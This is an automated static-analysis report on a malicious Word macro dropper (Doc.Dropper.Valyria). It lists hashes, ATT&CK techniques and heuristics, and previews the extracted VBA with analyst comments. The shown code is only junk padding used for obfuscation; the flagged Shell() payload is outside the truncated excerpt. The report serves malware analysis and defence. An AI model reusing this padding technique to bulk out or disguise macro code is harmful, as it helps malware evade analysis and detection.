Doc.Dropper.Valyria-6680534-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 54f695dc4f5498b1…

MALICIOUS

Office (OLE)

154.0 KB Created: 2018-07-24 07:21:00 Authoring application: Microsoft Office Word First seen: 2018-08-05
MD5: 751d6f55f351a3af0b9cb073f0d4a0d1 SHA-1: 4389ac84b495816fe222394d4c4d6437be27f3a0 SHA-256: 54f695dc4f5498b1b04287dbe71674273a3252e0f18e924b8acd8909f33c7caa
182 Risk Score

Malware Insights

Doc.Dropper.Valyria-6680534-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains VBA macros, including a Document_Open macro, and uses the Shell() function, indicating it is designed to execute arbitrary code on document open. The ClamAV detection name 'Doc.Dropper.Valyria-6680534-0' strongly suggests its purpose is to drop and execute a secondary payload. The only embedded URL is a standard Office XML schema namespace and is benign, but the overall behavior points to a malicious dropper.

Heuristics 5

  • ClamAV: Doc.Dropper.Valyria-6680534-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6680534-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30380 bytes
SHA-256: b9e9e7c3ba4136470bb5eeb68d6a39de7110927098e3b8f49d9a71f3fca7e276
Preview script
First 1,000 lines of the extracted script (the preview below is truncated; the Document_Open and Shell() code reported by the heuristics is not within the shown portion)
Attribute VB_Name = "jYzMtfRzD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: appears to be junk/padding code rather than payload logic.
' Every branch assigns to a name that is not declared anywhere in this module
' (no declarations precede the first procedure) and is never read afterwards,
' and the function never assigns its own return value, so it returns Empty.
' With On Error Resume Next, runtime errors from the arithmetic on these
' uninitialised operands (e.g. division by Empty) are silently swallowed.
' Such blocks typically inflate the module and hinder analysis; the flagged
' Document_Open / Shell() code is not in this excerpt (listing is truncated).
Private Function KRnAPrWG()
On Error Resume Next  ' suppresses every error raised by the expressions below
   If pvwwiQ Xor VBFVV Then
      wBDAYv = jfiiMH * miDiz - 43984 / AmLcvu / FwiQjz + 11836 * 87323 * sCJPS * 19853 / PkWsj
      Else
      zXXwtz = 203917903 / sYcAB
   End If
   If HRNcjX Xor moZVtN Then
      aQwHf = vHjXO * PPwMCs - 63969 / sNKhY / Jwwmv + 51434 * 72836 * ONPwj * 73576 / zhpNwI
      Else
      pcXcMN = 203917903 / NFRjM
   End If
   If nuJkbj Xor UQXIm Then
      FwjnZ = oEsRvp * CZvBw - 27061 / SiTCp / AMKQju + 97341 * 73165 * wrzENI * 45255 / cOvOdr
      Else
      OYumj = 203917903 / cizsz
   End If
   If ZPIYrP Xor tzjUT Then
      abLRi = sCWFU * szbPv - 44056 / kPoYqf / darQWq + 82581 * 12941 * YDanp * 99542 / CKoNzR
      Else
      dEJajv = 203917903 / DUlkoR
   End If
   If KzcnzC Xor izDIv Then
      tfUUZ = cGUOS * YrBHw - 28949 / phokN / wFfHiT + 38503 * 33796 * bhlzJC * 38085 / qiJZaK
      Else
      bzolFl = 203917903 / vGtbE
   End If
   If blAqaU Xor DEuArv Then
      rotSXU = CHAMCK * NzMPj - 57738 / rNEoI / VKitu + 78241 * 67068 * pEaaHI * 48663 / AiYJHq
      Else
      ilLRU = 203917903 / aodOFP
   End If
   If jdUlk Xor MUjEl Then
      lNCRw = rOLNP * LbVio - 4834 / ijwbK / NhfRjZ + 41615 * 96451 * ApRTmc * 49796 / uWOMaI
      Else
      dfjECl = 203917903 / msYkdL
   End If
End Function
' Analyst note: same padding pattern as the other junk procedures in this
' module — five If/Else blocks whose assignments target undeclared names that
' are never read, and no assignment to the function's own name (returns Empty).
' Errors from the arithmetic are suppressed by On Error Resume Next, so the
' procedure has no observable effect; it looks like filler meant to bulk out
' and obfuscate the macro rather than part of the dropper logic.
Private Function pmMWbAQXQvfqY()
On Error Resume Next  ' swallows any runtime error raised below
   If qiKdwM Xor FAoQzz Then
      LmwrtW = DbfHo * PaMuQU - 70361 / XnuBA / YnZUwX + 76465 * 29627 * UYJcn * 75148 / fVJlb
      Else
      ntAcMN = 203917903 / zDpskk
   End If
   If TmtzA Xor RYlnf Then
      VNwpUB = ZJjtiC * wTBasU - 60920 / zrHmuO / jLdsY + 28405 * 87482 * kPlBS * 24595 / tPuLZw
      Else
      LuKBm = 203917903 / GhhHU
   End If
   If oNjWqI Xor FERHJK Then
      IdNwiM = VwjRCO * cmzlQA - 57901 / ltFhwh / FTqFZ + 14879 * 34873 * sthsS * 31978 / EotPdS
      Else
      WtKTi = 203917903 / UszOIN
   End If
   If UPldaD Xor QKHTM Then
      Mwsri = IJAihX * fGChdj - 99041 / SddRlW / GAmroR + 3395 * 16331 * qYfLTU * 63153 / GwXzN
      Else
      dnNluU = 203917903 / azTQC
   End If
   If bzpTJ Xor EsjHL Then
      ooRni = plzwv * ZZzzv - 36262 / FZjdrE / TzPdJC + 16326 * 47743 * fbJfE * 46345 / TiBju
      Else
      XFzQXF = 203917903 / HLajmk
   End If
End Function
' Analyst note: junk/padding procedure. The six If/ElseIf blocks use a
' non-zero literal in each ElseIf condition (`x Or 79884` etc.), so that
' branch is always taken when the first test fails; every assignment goes to
' an undeclared name that is never read, and the function never sets its own
' return value. On Error Resume Next hides any error from the final division
' block. No payload behaviour is visible here — the Shell()/Document_Open code
' flagged by the heuristics lies outside this truncated excerpt.
Private Function ScKRtbKfnGbqVv()
On Error Resume Next  ' suppresses runtime errors for the whole procedure
   If SwWfs Or THJLs Then
      AIkol = CLng(3121)
      ElseIf VPUKO Or 79884 Then
      vhqaZ = 494058195 - 428397415
   End If
   If GQtsTO Or vBpjpY Then
      RRqna = CLng(3121)
      ElseIf wfwIkj Or 28553 Then
      cdjjRF = 494058195 - 428397415
   End If
   If PsVXiZ Or faYRz Then
      PznzIn = CLng(3121)
      ElseIf RlHmzi Or 37086 Then
      IzYSS = 494058195 - 428397415
   End If
   If wOiCsD Or rQufl Then
      PbTGQ = CLng(3121)
      ElseIf KuzwGk Or 37089 Then
      dfYakR = 494058195 - 428397415
   End If
   If YzwoF Or hutwvr Then
      qPUSR = CLng(3121)
      ElseIf VIdBAh Or 40160 Then
      GQNZUG = 494058195 - 428397415
   End If
   If FnOGR Or llGBj Then
      rpuTE = CLng(3121)
      ElseIf wsBQX Or 35624 Then
      bbLrT = 494058195 - 428397415
   End If
   ' Same Xor/division filler shape as the other padding procedures.
   If BwNAL Xor kDIiLU Then
      IOrdWz = MbnPn * ksSHtw - 60971 / wCNjk / sGIOQ + 79530 * 8679 * skNzzk * 23529 / LwMSIs
      Else
      AlOpXJ = 203917903 / iwlYP
   End If
End Function
Private Function inOaKwh()
On Error Resume Next
   If KGibN Xor PoWIO Then
      WCkjLL = wKoCv * RjbTi - 27740 / LBczd / FiuFNK + 59355 * 10565 * uzudw * 83762 / wWDnbv
      Else
      nUotwd = 203917903 / ZnGQG
   End If
   If DNfdPu Xor SbriZ Then
      KMVqL = crLAN * FabqP - 41278 / pPqswX / qFwzZi + 96892 * 68631 * swizFJ * 72917 / MSGKTf
      Else
      LVpkBU = 203917903 / ZSOjX
   End I
... (truncated)